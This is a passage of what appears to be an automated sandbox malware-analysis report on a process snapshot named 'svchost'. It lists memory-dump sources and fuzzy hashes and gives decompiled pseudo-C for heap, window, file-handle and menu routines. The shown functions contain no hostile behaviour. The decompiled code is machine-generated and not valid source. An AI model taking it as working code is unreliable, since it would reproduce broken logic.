    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d1396680eb312b65d1212cfa43dfceb587bc841e1f4ac143ad28e0d37578becc
    • Instruction ID: 4e0cd58cf15c4c090ff505e9b242d246e933eceb0b0d7a050c024b70f2525f2e
    • Opcode Fuzzy Hash: d1396680eb312b65d1212cfa43dfceb587bc841e1f4ac143ad28e0d37578becc
    • Instruction Fuzzy Hash: F8C1B171504306AFC710DF24D8819ABB3E9EFD4708F14492EF845A7341EB38E946CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E004727BB(void* _a4, long _a8) {
    				signed int _v8;
    				intOrPtr _v20;
    				long _v36;
    				void* _v40;
    				intOrPtr _v44;
    				char _v48;
    				long _v52;
    				long _v56;
    				char _v60;
    				intOrPtr _t56;
    				void* _t57;
    				long _t58;
    				long _t59;
    				long _t63;
    				long _t66;
    				long _t68;
    				long _t71;
    				long _t72;
    				long _t74;
    				long _t78;
    				intOrPtr _t80;
    				void* _t83;
    				long _t85;
    				long _t88;
    				void* _t89;
    				long _t91;
    				intOrPtr _t93;
    				void* _t97;
    				void* _t104;
    				long _t113;
    				long _t116;
    				intOrPtr _t122;
    				void* _t123;
    
    				_push(0xffffffff);
    				_push(0x49d760);
    				_push(E00472CF4);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t122;
    				_t123 = _t122 - 0x28;
    				_t97 = _a4;
    				_t113 = 0;
    				if(_t97 != 0) {
    					_t116 = _a8;
    					__eflags = _t116;
    					if(_t116 != 0) {
    						_t56 =  *0x4e1c8c; // 0x1
    						__eflags = _t56 - 3;
    						if(_t56 != 3) {
    							__eflags = _t56 - 2;
    							if(_t56 != 2) {
    								while(1) {
    									_t57 = 0;
    									__eflags = _t116 - 0xffffffe0;
    									if(_t116 <= 0xffffffe0) {
    										__eflags = _t116 - _t113;
    										if(_t116 == _t113) {
    											_t116 = 1;
    										}
    										_t116 = _t116 + 0x0000000f & 0xfffffff0;
    										__eflags = _t116;
    										_t57 = RtlReAllocateHeap( *0x4e1c88, _t113, _t97, _t116);
    									}
    									__eflags = _t57 - _t113;
    									if(_t57 != _t113) {
    										goto L64;
    									}
    									__eflags =  *0x4e19b0 - _t113; // 0x0
    									if(__eflags == 0) {
    										goto L64;
    									}
    									_t58 = E00479929(_t116);
    									__eflags = _t58;
    									if(_t58 != 0) {
    										continue;
    									}
    									goto L63;
    								}
    								goto L64;
    							}
    							__eflags = _t116 - 0xffffffe0;
    							if(_t116 <= 0xffffffe0) {
    								__eflags = _t116;
    								if(_t116 <= 0) {
    									_t116 = 0x10;
    								} else {
    									_t116 = _t116 + 0x0000000f & 0xfffffff0;
    								}
    								_a8 = _t116;
    							}
    							while(1) {
    								_v40 = _t113;
    								__eflags = _t116 - 0xffffffe0;
    								if(_t116 <= 0xffffffe0) {
    									E004774D4(9);
    									_pop(_t104);
    									_v8 = 1;
    									_t63 = E004794B8(_t97,  &_v60,  &_v48);
    									_t123 = _t123 + 0xc;
    									_t113 = _t63;
    									_v52 = _t113;
    									__eflags = _t113;
    									if(_t113 == 0) {
    										_v40 = RtlReAllocateHeap( *0x4e1c88, 0, _t97, _t116);
    									} else {
    										__eflags = _t116 -  *0x4bc034; // 0x1e0
    										if(__eflags < 0) {
    											_t100 = _t116 >> 4;
    											_t71 = E00479880(_t104, _v60, _v48, _t113, _t116 >> 4);
    											_t123 = _t123 + 0x10;
    											__eflags = _t71;
    											if(_t71 == 0) {
    												_t72 = E00479554(_t104, _t100);
    												_v40 = _t72;
    												__eflags = _t72;
    												if(_t72 != 0) {
    													_t74 = ( *_t113 & 0x000000ff) << 4;
    													_v56 = _t74;
    													__eflags = _t74 - _t116;
    													if(_t74 >= _t116) {
    														_t74 = _t116;
    													}
    													E00472FB0(_v40, _a4, _t74);
    													E0047950F(_v60, _v48, _t113);
    													_t123 = _t123 + 0x18;
    												}
    											} else {
    												_v40 = _a4;
    											}
    											_t97 = _a4;
    										}
    										__eflags = _v40;
    										if(_v40 == 0) {
    											_t66 = RtlAllocateHeap( *0x4e1c88, 0, _t116);
    											_v40 = _t66;
    											__eflags = _t66;
    											if(_t66 != 0) {
    												_t68 = ( *_t113 & 0x000000ff) << 4;
    												_v56 = _t68;
    												__eflags = _t68 - _t116;
    												if(_t68 >= _t116) {
    													_t68 = _t116;
    												}
    												E00472FB0(_v40, _t97, _t68);
    												E0047950F(_v60, _v48, _t113);
    												_t123 = _t123 + 0x18;
    											}
    										}
    									}
    									_t51 =  &_v8;
    									 *_t51 = _v8 | 0xffffffff;
    									__eflags =  *_t51;
    									E00472A94();
    								}
    								_t57 = _v40;
    								__eflags = _t57 - _t113;
    								if(_t57 != _t113) {
    									goto L64;
    								}
    								__eflags =  *0x4e19b0 - _t113; // 0x0
    								if(__eflags == 0) {
    									goto L64;
    								}
    								_t59 = E00479929(_t116);
    								__eflags = _t59;
    								if(_t59 != 0) {
    									continue;
    								}
    								goto L63;
    							}
    							goto L64;
    						} else {
    							goto L5;
    						}
    						do {
    							L5:
    							_v40 = _t113;
    							__eflags = _t116 - 0xffffffe0;
    							if(_t116 > 0xffffffe0) {
    								L25:
    								_t57 = _v40;
    								__eflags = _t57 - _t113;
    								if(_t57 != _t113) {
    									goto L64;
    								}
    								__eflags =  *0x4e19b0 - _t113; // 0x0
    								if(__eflags == 0) {
    									goto L64;
    								}
    								goto L27;
    							}
    							E004774D4(9);
    							_v8 = _t113;
    							_t80 = E0047875D(_t97);
    							_v44 = _t80;
    							__eflags = _t80 - _t113;
    							if(_t80 == _t113) {
    								L21:
    								_v8 = _v8 | 0xffffffff;
    								E00472946();
    								__eflags = _v44 - _t113;
    								if(_v44 == _t113) {
    									__eflags = _t116 - _t113;
    									if(_t116 == _t113) {
    										_t116 = 1;
    									}
    									_t116 = _t116 + 0x0000000f & 0xfffffff0;
    									__eflags = _t116;
    									_a8 = _t116;
    									_v40 = RtlReAllocateHeap( *0x4e1c88, _t113, _t97, _t116);
    								}
    								goto L25;
    							}
    							__eflags = _t116 -  *0x4e1c84; // 0x0
    							if(__eflags <= 0) {
    								_push(_t116);
    								_push(_t97);
    								_push(_t80);
    								_t88 = E00478F66();
    								_t123 = _t123 + 0xc;
    								__eflags = _t88;
    								if(_t88 == 0) {
    									_push(_t116);
    									_t89 = E00478AB1();
    									_v40 = _t89;
    									__eflags = _t89 - _t113;
    									if(_t89 != _t113) {
    										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
    										_v36 = _t91;
    										__eflags = _t91 - _t116;
    										if(_t91 >= _t116) {
    											_t91 = _t116;
    										}
    										E00472FB0(_v40, _t97, _t91);
    										_t93 = E0047875D(_t97);
    										_v44 = _t93;
    										_push(_t97);
    										_push(_t93);
    										E00478788();
    										_t123 = _t123 + 0x18;
    									}
    								} else {
    									_v40 = _t97;
    								}
    							}
    							__eflags = _v40 - _t113;
    							if(_v40 == _t113) {
    								__eflags = _t116 - _t113;
    								if(_t116 == _t113) {
    									_t116 = 1;
    									_a8 = _t116;
    								}
    								_t116 = _t116 + 0x0000000f & 0xfffffff0;
    								_a8 = _t116;
    								_t83 = RtlAllocateHeap( *0x4e1c88, _t113, _t116);
    								_v40 = _t83;
    								__eflags = _t83 - _t113;
    								if(_t83 != _t113) {
    									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
    									_v36 = _t85;
    									__eflags = _t85 - _t116;
    									if(_t85 >= _t116) {
    										_t85 = _t116;
    									}
    									E00472FB0(_v40, _t97, _t85);
    									_push(_t97);
    									_push(_v44);
    									E00478788();
    									_t123 = _t123 + 0x14;
    								}
    							}
    							goto L21;
    							L27:
    							_t78 = E00479929(_t116);
    							__eflags = _t78;
    						} while (_t78 != 0);
    						goto L63;
    					} else {
    						E004715AE(_t97);
    						L63:
    						_t57 = 0;
    						__eflags = 0;
    						goto L64;
    					}
    				} else {
    					_t57 = E00471697(_a8);
    					L64:
    					 *[fs:0x0] = _v20;
    					return _t57;
    				}
    			}

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c95a0453f2a886db02d7feddd7a33b19040cab5039f7dd0c374fb453815813c8
    • Instruction ID: d18b9b9894df037fe9f47e1def08ea6c3c2202dc05b00bb2e19c3581c3484842
    • Opcode Fuzzy Hash: c95a0453f2a886db02d7feddd7a33b19040cab5039f7dd0c374fb453815813c8
    • Instruction Fuzzy Hash: D491F9B1D00114AFDF21AB69CE849DE7BB4EB44364F24C62BF81CB6291E7B94D40876D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0041EA90(intOrPtr __ecx) {
    				void* __esi;
    				intOrPtr _t60;
    				intOrPtr _t71;
    				intOrPtr _t78;
    				void* _t85;
    				void* _t87;
    				signed int _t92;
    				intOrPtr _t96;
    				signed int _t100;
    				signed int _t103;
    				intOrPtr _t139;
    				void* _t142;
    				intOrPtr _t146;
    				void* _t150;
    				intOrPtr* _t151;
    				void* _t152;
    				void* _t153;
    				intOrPtr _t155;
    				intOrPtr _t157;
    				intOrPtr _t161;
    				void* _t162;
    
    				_push(0xffffffff);
    				_push(E0048EA20);
    				_t60 =  *[fs:0x0];
    				_push(_t60);
    				 *[fs:0x0] = _t161;
    				_t162 = _t161 - 0x40;
    				_t157 = __ecx;
    				_t96 = 0;
    				 *((intOrPtr*)(_t162 + 8)) = __ecx;
    				_t164 =  *((intOrPtr*)(__ecx + 0x1e0));
    				if( *((intOrPtr*)(__ecx + 0x1e0)) == 0) {
    					L23:
    					 *[fs:0x0] =  *((intOrPtr*)(_t162 + 0x48));
    					return _t60;
    				}
    				E0040B5D0(_t162 + 0x3c);
    				 *((intOrPtr*)(_t162 + 0x3c)) = 0x496394;
    				 *((intOrPtr*)(_t162 + 0x58)) = 0;
    				E0040B5D0(_t162 + 0x28);
    				 *((intOrPtr*)(_t162 + 0x28)) = 0x496394;
    				 *((char*)(_t162 + 0x64)) = 1;
    				if(E00413AB0(E00418A40(0x3e9, 0, 0), _t164,  *((intOrPtr*)(_t157 + 0xdc)), _t162 + 0x14, 0) != 1) {
    					L13:
    					_t146 = 0;
    					_t100 = ( *(_t162 + 0x4c) >> 2) - 1;
    					__eflags = _t100;
    					if(_t100 < 0) {
    						L18:
    						GetClientRect( *(_t157 + 0x1c), _t162 + 0x18);
    						_t139 =  *((intOrPtr*)(_t162 + 0x24));
    						_t103 = ( *(_t162 + 0x38) >> 2) - 1;
    						__eflags = _t103;
    						if(_t103 < 0) {
    							L22:
    							 *((char*)(_t162 + 0x58)) = 0;
    							 *((intOrPtr*)(_t162 + 0x28)) = 0x4962b0;
    							E0040B7D0(_t162 + 0x28);
    							 *((intOrPtr*)(_t162 + 0x58)) = 0xffffffff;
    							 *((intOrPtr*)(_t162 + 0x3c)) = 0x4962b0;
    							_t60 = E0040B7D0(_t162 + 0x3c);
    							goto L23;
    						} else {
    							goto L19;
    						}
    						do {
    							L19:
    							_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x30)) + _t103 * 4));
    							GetWindowRect( *( *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x30)) + _t103 * 4)) + 0x1c), _t162 + 0x18);
    							E00489A84( *((intOrPtr*)(_t162 + 0x10)), _t162 + 0x18);
    							_t71 =  *((intOrPtr*)(_t162 + 0x24));
    							_t150 = _t71 -  *((intOrPtr*)(_t162 + 0x1c));
    							__eflags = _t139 - _t71;
    							if(_t139 != _t71) {
    								__eflags =  *((intOrPtr*)(_t162 + 0x20)) -  *((intOrPtr*)(_t162 + 0x20));
    								 *((intOrPtr*)(_t162 + 0x2c)) = _t139;
    								 *((intOrPtr*)(_t162 + 0x30)) = _t139 - _t150;
    								E00487591(_t159,  *((intOrPtr*)(_t162 + 0x20)), _t139 - _t150,  *((intOrPtr*)(_t162 + 0x20)) -  *((intOrPtr*)(_t162 + 0x20)), _t139 - _t139 - _t150, 1);
    							}
    							_t139 = _t139 - _t150;
    							_t103 = _t103 - 1;
    							__eflags = _t103;
    						} while (_t103 >= 0);
    						goto L22;
    					} else {
    						goto L14;
    					}
    					do {
    						L14:
    						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x44)) + _t100 * 4));
    						GetWindowRect( *( *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x44)) + _t100 * 4)) + 0x1c), _t162 + 0x18);
    						E00489A84( *((intOrPtr*)(_t162 + 0x14)), _t162 + 0x18);
    						_t78 =  *((intOrPtr*)(_t162 + 0x1c));
    						_t142 =  *((intOrPtr*)(_t162 + 0x24)) - _t78;
    						__eflags = _t146 - _t78;
    						if(_t146 != _t78) {
    							 *((intOrPtr*)(_t162 + 0x24)) = _t142 + _t146;
    							__eflags =  *((intOrPtr*)(_t162 + 0x20)) -  *((intOrPtr*)(_t162 + 0x20));
    							 *((intOrPtr*)(_t162 + 0x24)) = _t146;
    							E00487591(_t160,  *((intOrPtr*)(_t162 + 0x20)), _t146,  *((intOrPtr*)(_t162 + 0x20)) -  *((intOrPtr*)(_t162 + 0x20)), _t142 + _t146 - _t146, 1);
    						}
    						_t146 = _t146 + _t142;
    						_t100 = _t100 - 1;
    						__eflags = _t100;
    					} while (_t100 >= 0);
    					_t157 =  *((intOrPtr*)(_t162 + 0x10));
    					goto L18;
    				}
    				while(1) {
    					_t12 =  *((intOrPtr*)(_t162 + 0x14)) + 0x14; // 0x14
    					_t151 = E004135B0(_t12, _t96, 0);
    					if(_t151 == 0) {
    						goto L13;
    					}
    					_t124 =  *_t151;
    					_t85 = E00418A40(0x3ea,  *_t151, 0);
    					if(_t85 == 0 || ( *(_t85 + 0x14) & 0x00100000) == 0) {
    						L12:
    						_t96 = _t96 + 1;
    						continue;
    					} else {
    						_t152 = _t151 + 0x18;
    						_t153 = _t152 + E0040C020(_t124, _t152);
    						_t87 = E0040C020(_t124, _t153);
    						_t162 = _t162 + 8;
    						_t155 =  *((intOrPtr*)(_t153 + _t87));
    						if(_t155 == 0 || IsWindow( *(_t155 + 0x1c)) == 0) {
    							goto L12;
    						} else {
    							SendMessageA( *(_t155 + 0x1c), 0x8003, 0, 0);
    							_t92 = E004874EA(_t155) & 0x00000003;
    							if(_t92 != 1) {
    								__eflags = _t92 - 3;
    								if(_t92 == 3) {
    									E0040B860(_t162 + 0x2c, _t155, _t155);
    								}
    								goto L12;
    							}
    							E0040B860(_t162 + 0x40, _t155, _t155);
    							_t96 = _t96 + 1;
    							continue;
    						}
    					}
    				}
    				goto L13;
    			}

    APIs
    • IsWindow.USER32(?), ref: 0041EB6C
    • SendMessageA.USER32(?,00008003,00000000,00000000), ref: 0041EB83
    • GetWindowRect.USER32(?,00000000), ref: 0041EBD5
    • GetClientRect.USER32(?,00000000), ref: 0041EC2D
    • GetWindowRect.USER32(?,00000000), ref: 0041EC51
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: RectWindow$ClientMessageSend
    • String ID:
    • API String ID: 1071774122-0
    • Opcode ID: 218b6507bebca5f1521e79dd105ed75d108315d3206bc26d02c369229a79139a
    • Instruction ID: c3ecebb496dc53ac50e4da2302c7bea0a928e615a052645fe8566d31972ee628
    • Opcode Fuzzy Hash: 218b6507bebca5f1521e79dd105ed75d108315d3206bc26d02c369229a79139a
    • Instruction Fuzzy Hash: 5C61A075608355AFC710DF26C880AABB7E8EB84744F004A1EF98597381DB78ED45CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E00474A12() {
    				void** _v8;
    				struct _STARTUPINFOA _v76;
    				signed int* _t48;
    				signed int _t50;
    				long _t55;
    				signed int _t57;
    				signed int _t58;
    				int _t59;
    				signed char _t63;
    				signed int _t65;
    				void** _t67;
    				int _t68;
    				int _t69;
    				signed int* _t70;
    				int _t72;
    				intOrPtr* _t73;
    				signed int* _t75;
    				void* _t76;
    				void* _t84;
    				void* _t87;
    				int _t88;
    				signed int* _t89;
    				void** _t90;
    				signed int _t91;
    				int* _t92;
    
    				_t89 = E00471697(0x480);
    				if(_t89 == 0) {
    					E0046FE64(0x1b);
    				}
    				 *0x4e1ca0 = _t89;
    				 *0x4e1da0 = 0x20;
    				_t1 =  &(_t89[0x120]); // 0x480
    				_t48 = _t1;
    				while(_t89 < _t48) {
    					_t89[1] = _t89[1] & 0x00000000;
    					 *_t89 =  *_t89 | 0xffffffff;
    					_t89[2] = _t89[2] & 0x00000000;
    					_t89[1] = 0xa;
    					_t70 =  *0x4e1ca0; // 0x4d010a8
    					_t89 =  &(_t89[9]);
    					_t48 =  &(_t70[0x120]);
    				}
    				GetStartupInfoA( &_v76);
    				__eflags = _v76.cbReserved2;
    				if(_v76.cbReserved2 == 0) {
    					L25:
    					_t72 = 0;
    					__eflags = 0;
    					do {
    						_t75 =  *0x4e1ca0; // 0x4d010a8
    						_t50 = _t72 + _t72 * 8;
    						__eflags = _t75[_t50] - 0xffffffff;
    						_t90 =  &(_t75[_t50]);
    						if(_t75[_t50] != 0xffffffff) {
    							_t45 =  &(_t90[1]);
    							 *_t45 = _t90[1] | 0x00000080;
    							__eflags =  *_t45;
    							goto L37;
    						}
    						__eflags = _t72;
    						_t90[1] = 0x81;
    						if(_t72 != 0) {
    							asm("sbb eax, eax");
    							_t55 =  ~(_t72 - 1) + 0xfffffff5;
    							__eflags = _t55;
    						} else {
    							_t55 = 0xfffffff6;
    						}
    						_t87 = GetStdHandle(_t55);
    						__eflags = _t87 - 0xffffffff;
    						if(_t87 == 0xffffffff) {
    							L33:
    							_t90[1] = _t90[1] | 0x00000040;
    						} else {
    							_t57 = GetFileType(_t87);
    							__eflags = _t57;
    							if(_t57 == 0) {
    								goto L33;
    							}
    							_t58 = _t57 & 0x000000ff;
    							 *_t90 = _t87;
    							__eflags = _t58 - 2;
    							if(_t58 != 2) {
    								__eflags = _t58 - 3;
    								if(_t58 == 3) {
    									_t90[1] = _t90[1] | 0x00000008;
    								}
    								goto L37;
    							}
    							goto L33;
    						}
    						L37:
    						_t72 = _t72 + 1;
    						__eflags = _t72 - 3;
    					} while (_t72 < 3);
    					return SetHandleCount( *0x4e1da0);
    				}
    				_t59 = _v76.lpReserved2;
    				__eflags = _t59;
    				if(_t59 == 0) {
    					goto L25;
    				}
    				_t88 =  *_t59;
    				_t73 = _t59 + 4;
    				_v8 = _t73 + _t88;
    				__eflags = _t88 - 0x800;
    				if(_t88 >= 0x800) {
    					_t88 = 0x800;
    				}
    				__eflags =  *0x4e1da0 - _t88; // 0x20
    				if(__eflags >= 0) {
    					L18:
    					_t91 = 0;
    					__eflags = _t88;
    					if(_t88 <= 0) {
    						goto L25;
    					} else {
    						goto L19;
    					}
    					do {
    						L19:
    						_t76 =  *_v8;
    						__eflags = _t76 - 0xffffffff;
    						if(_t76 == 0xffffffff) {
    							goto L24;
    						}
    						_t63 =  *_t73;
    						__eflags = _t63 & 0x00000001;
    						if((_t63 & 0x00000001) == 0) {
    							goto L24;
    						}
    						__eflags = _t63 & 0x00000008;
    						if((_t63 & 0x00000008) != 0) {
    							L23:
    							_t65 = _t91 & 0x0000001f;
    							__eflags = _t65;
    							_t67 =  &(0x4e1ca0[_t91 >> 5][_t65 + _t65 * 8]);
    							 *_t67 =  *_v8;
    							_t67[1] =  *_t73;
    							goto L24;
    						}
    						_t68 = GetFileType(_t76);
    						__eflags = _t68;
    						if(_t68 == 0) {
    							goto L24;
    						}
    						goto L23;
    						L24:
    						_v8 =  &(_v8[1]);
    						_t91 = _t91 + 1;
    						_t73 = _t73 + 1;
    						__eflags = _t91 - _t88;
    					} while (_t91 < _t88);
    					goto L25;
    				} else {
    					_t92 = 0x4e1ca4;
    					while(1) {
    						_t69 = E00471697(0x480);
    						__eflags = _t69;
    						if(_t69 == 0) {
    							break;
    						}
    						 *0x4e1da0 =  *0x4e1da0 + 0x20;
    						__eflags =  *0x4e1da0;
    						 *_t92 = _t69;
    						_t13 = _t69 + 0x480; // 0x480
    						_t84 = _t13;
    						while(1) {
    							__eflags = _t69 - _t84;
    							if(_t69 >= _t84) {
    								break;
    							}
    							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
    							 *_t69 =  *_t69 | 0xffffffff;
    							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
    							 *((char*)(_t69 + 5)) = 0xa;
    							_t69 = _t69 + 0x24;
    							_t84 =  *_t92 + 0x480;
    						}
    						_t92 =  &(_t92[1]);
    						__eflags =  *0x4e1da0 - _t88; // 0x20
    						if(__eflags < 0) {
    							continue;
    						}
    						goto L18;
    					}
    					_t88 =  *0x4e1da0; // 0x20
    					goto L18;
    				}
    			}

    APIs
    • GetStartupInfoA.KERNEL32(?), ref: 00474A70
    • GetFileType.KERNEL32(?,?,00000000), ref: 00474B1B
    • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00474B7E
    • GetFileType.KERNEL32(00000000,?,00000000), ref: 00474B8C
    • SetHandleCount.KERNEL32 ref: 00474BC3
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: FileHandleType$CountInfoStartup
    • String ID:
    • API String ID: 1710529072-0
    • Opcode ID: 02b5e9d278c2a490232e65fabb22e76456600c2ea441d755afe35da5ddf5d6b6
    • Instruction ID: c92269a868fe239951940312916863b04533c493ba96912ee8b532712e3f3691
    • Opcode Fuzzy Hash: 02b5e9d278c2a490232e65fabb22e76456600c2ea441d755afe35da5ddf5d6b6
    • Instruction Fuzzy Hash: 2451E7315402458FC721CB28C8847BA77E0AB91368F29C67FD5AADB2E1D738ED05C759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041CBB0(void* __ecx) {
    				struct HMENU__* _v4;
    				struct HMENU__* _v8;
    				struct HMENU__* _v32;
    				int _v36;
    				intOrPtr _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v60;
    				struct HMENU__* _t29;
    				void* _t40;
    				void* _t42;
    				void* _t44;
    				void* _t58;
    				struct HMENU__* _t60;
    				intOrPtr* _t61;
    				void* _t62;
    				void* _t66;
    
    				_t66 =  &_v48;
    				_t58 = __ecx;
    				E0048538E(__ecx);
    				_t67 =  *((intOrPtr*)(_t58 + 0xd8));
    				if( *((intOrPtr*)(_t58 + 0xd8)) == 0 && E00413AB0(E00418A40(0x3e9, 0, 0), _t67,  *((intOrPtr*)(_t58 + 0xdc)),  &_v60, 0) == 1) {
    					_t44 = 0;
    					while(1) {
    						_t61 = E004135B0(_v48 + 0x14, _t44, 0);
    						if(_t61 == 0) {
    							goto L8;
    						}
    						_t52 =  *_t61;
    						_t40 = E00418A40(0x3ea,  *_t61, 0);
    						if(_t40 != 0 && ( *(_t40 + 0x14) & 0x00080000) != 0) {
    							_t62 = _t61 + 0x18;
    							_t63 = _t62 + E0040C020(_t52, _t62);
    							_t42 = E0040C020(_t52, _t62 + E0040C020(_t52, _t62));
    							_t66 = _t66 + 8;
    							E0042AB10( *((intOrPtr*)(_t63 + _t42)) + 0x5c);
    						}
    						_t44 = _t44 + 1;
    					}
    				}
    				L8:
    				_v44 =  *((intOrPtr*)(_t58 + 0xdc));
    				_v40 =  *((intOrPtr*)(_t58 + 0xe0));
    				_v36 = 2;
    				_v32 = 0;
    				_v8 = 0;
    				_v4 = 0;
    				E00418A40(0x7d8,  &_v44, 0);
    				_t29 = IsWindow( *(_t58 + 0x1c));
    				__eflags = _t29;
    				if(_t29 != 0) {
    					__eflags =  *((intOrPtr*)(_t58 + 0xe4)) - 1;
    					if( *((intOrPtr*)(_t58 + 0xe4)) == 1) {
    						WinHelpA( *(_t58 + 0x1c), 0, 2, 0);
    						 *((intOrPtr*)(_t58 + 0xe4)) = 0;
    					}
    					_t60 = GetMenu( *(_t58 + 0x1c));
    					SetMenu( *(_t58 + 0x1c), 0);
    					__eflags = _t60;
    					if(_t60 != 0) {
    						DestroyMenu(_t60);
    					}
    					return E0041BEB0(_t58, 0, 0);
    				}
    				return _t29;
    			}

    APIs
    • IsWindow.USER32(?), ref: 0041CC80
    • WinHelpA.USER32(?,00000000,00000002,00000000), ref: 0041CC9B
    • GetMenu.USER32(?), ref: 0041CCAB
    • SetMenu.USER32(?,00000000), ref: 0041CCB8
    • DestroyMenu.USER32(00000000), ref: 0041CCC3
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
